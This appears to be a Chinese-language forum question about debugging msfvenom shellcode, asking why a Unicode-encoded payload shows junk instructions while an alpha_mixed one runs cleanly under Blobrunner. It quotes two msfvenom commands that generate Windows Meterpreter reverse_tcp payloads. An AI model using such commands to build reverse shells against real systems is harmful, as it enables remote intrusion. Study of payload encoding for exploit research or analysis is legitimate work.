我想调试一些msfvenom生成的有效载荷。当我以这种方式使用“标准”编码生成有效负载时,我完全能够做到这一点:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/alpha_mixed BufferRegister=ECX
在这种情况下,我可以获得生成的有效负载,使用Blobrunner 之类的东西,我就可以开始了。
如果我生成一个带有 unicode 编码的 shellcode
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed BufferRegister=ECX
同样不起作用:当我处理 shellcode 时,我得到了很多重复/无效的指令。这是有道理的,因为我想我将它作为正常编码进行管理。但是如何调试这个 shellcode?有什么工具可以将其转换为“有效”序列,去除“unicode padding”?
非常感谢!